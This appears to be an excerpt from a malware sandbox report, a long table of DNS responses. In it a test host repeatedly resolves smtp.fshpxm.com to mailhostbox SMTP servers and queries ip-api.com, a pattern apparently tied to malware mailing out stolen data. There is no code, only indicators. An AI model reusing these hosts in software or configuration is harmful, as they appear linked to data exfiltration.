                                                                                      Apr 18, 2024 10:24:05.679852009 CEST8.8.8.8192.168.2.220x9601No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.679852009 CEST8.8.8.8192.168.2.220x9601No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.679852009 CEST8.8.8.8192.168.2.220x9601No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.785197973 CEST8.8.8.8192.168.2.220x9601No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.785197973 CEST8.8.8.8192.168.2.220x9601No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.785197973 CEST8.8.8.8192.168.2.220x9601No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.785197973 CEST8.8.8.8192.168.2.220x9601No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.785197973 CEST8.8.8.8192.168.2.220x9601No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.374483109 CEST8.8.8.8192.168.2.220x8774No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.374483109 CEST8.8.8.8192.168.2.220x8774No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.374483109 CEST8.8.8.8192.168.2.220x8774No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.374483109 CEST8.8.8.8192.168.2.220x8774No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.374483109 CEST8.8.8.8192.168.2.220x8774No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.700669050 CEST8.8.8.8192.168.2.220x8774No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.700669050 CEST8.8.8.8192.168.2.220x8774No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.700669050 CEST8.8.8.8192.168.2.220x8774No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.700669050 CEST8.8.8.8192.168.2.220x8774No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.700669050 CEST8.8.8.8192.168.2.220x8774No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.351823092 CEST8.8.8.8192.168.2.220x6143No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.351823092 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.351823092 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.351823092 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.351823092 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.457222939 CEST8.8.8.8192.168.2.220x6143No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.457222939 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.457222939 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.457222939 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.457222939 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.591680050 CEST8.8.8.8192.168.2.220x6143No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.591680050 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.591680050 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.591680050 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.591680050 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.697057009 CEST8.8.8.8192.168.2.220x6143No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.697057009 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.697057009 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.697057009 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.697057009 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.802454948 CEST8.8.8.8192.168.2.220x6143No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.802454948 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.802454948 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.802454948 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.802454948 CEST8.8.8.8192.168.2.220x6143No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:09.026017904 CEST8.8.8.8192.168.2.220xf38aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:09.147062063 CEST8.8.8.8192.168.2.220xf38aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.150906086 CEST8.8.8.8192.168.2.220x5051No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.150906086 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.150906086 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.150906086 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.150906086 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.191788912 CEST8.8.8.8192.168.2.220xe35aNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.191788912 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.191788912 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.191788912 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.191788912 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.256194115 CEST8.8.8.8192.168.2.220x5051No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.256194115 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.256194115 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.256194115 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.256194115 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.298892975 CEST8.8.8.8192.168.2.220xe35aNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.298892975 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.298892975 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.298892975 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.298892975 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.362170935 CEST8.8.8.8192.168.2.220x5051No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.362170935 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.362170935 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.362170935 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.362170935 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.407037020 CEST8.8.8.8192.168.2.220xe35aNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.407037020 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.407037020 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.407037020 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.407037020 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.468060970 CEST8.8.8.8192.168.2.220x5051No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.468060970 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.468060970 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.468060970 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.468060970 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.513268948 CEST8.8.8.8192.168.2.220xe35aNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.513268948 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.513268948 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.513268948 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.513268948 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.575653076 CEST8.8.8.8192.168.2.220x5051No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.575653076 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.575653076 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.575653076 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.575653076 CEST8.8.8.8192.168.2.220x5051No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.642803907 CEST8.8.8.8192.168.2.220xe35aNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.642803907 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.642803907 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.642803907 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.642803907 CEST8.8.8.8192.168.2.220xe35aNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.223377943 CEST8.8.8.8192.168.2.220x3569No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.223377943 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.223377943 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.223377943 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.223377943 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.328705072 CEST8.8.8.8192.168.2.220x3569No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.328705072 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.328705072 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.328705072 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.328705072 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.434159040 CEST8.8.8.8192.168.2.220x3569No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.434159040 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.434159040 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.434159040 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.434159040 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.539330959 CEST8.8.8.8192.168.2.220x3569No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.539330959 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.539330959 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.539330959 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.539330959 CEST8.8.8.8192.168.2.220x3569No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.839651108 CEST8.8.8.8192.168.2.220xe23aNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.839651108 CEST8.8.8.8192.168.2.220xe23aNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.839651108 CEST8.8.8.8192.168.2.220xe23aNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.839651108 CEST8.8.8.8192.168.2.220xe23aNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.839651108 CEST8.8.8.8192.168.2.220xe23aNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.944811106 CEST8.8.8.8192.168.2.220xe23aNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.944811106 CEST8.8.8.8192.168.2.220xe23aNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.944811106 CEST8.8.8.8192.168.2.220xe23aNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.944811106 CEST8.8.8.8192.168.2.220xe23aNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.944811106 CEST8.8.8.8192.168.2.220xe23aNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.000364065 CEST8.8.8.8192.168.2.220xb656No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.000364065 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.000364065 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.000364065 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.000364065 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.105609894 CEST8.8.8.8192.168.2.220xb656No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.105609894 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.105609894 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.105609894 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.105609894 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.210928917 CEST8.8.8.8192.168.2.220xb656No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.210928917 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.210928917 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.210928917 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.210928917 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.317935944 CEST8.8.8.8192.168.2.220xb656No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.317935944 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.317935944 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.317935944 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.317935944 CEST8.8.8.8192.168.2.220xb656No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.433374882 CEST8.8.8.8192.168.2.220x428fNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.433374882 CEST8.8.8.8192.168.2.220x428fNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.433374882 CEST8.8.8.8192.168.2.220x428fNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.433374882 CEST8.8.8.8192.168.2.220x428fNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.433374882 CEST8.8.8.8192.168.2.220x428fNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.538892984 CEST8.8.8.8192.168.2.220x428fNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.538892984 CEST8.8.8.8192.168.2.220x428fNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.538892984 CEST8.8.8.8192.168.2.220x428fNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.538892984 CEST8.8.8.8192.168.2.220x428fNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.538892984 CEST8.8.8.8192.168.2.220x428fNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.291060925 CEST8.8.8.8192.168.2.220x47b9No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.291060925 CEST8.8.8.8192.168.2.220x47b9No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.291060925 CEST8.8.8.8192.168.2.220x47b9No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.291060925 CEST8.8.8.8192.168.2.220x47b9No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.291060925 CEST8.8.8.8192.168.2.220x47b9No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.397862911 CEST8.8.8.8192.168.2.220x47b9No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.397862911 CEST8.8.8.8192.168.2.220x47b9No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.397862911 CEST8.8.8.8192.168.2.220x47b9No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.397862911 CEST8.8.8.8192.168.2.220x47b9No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
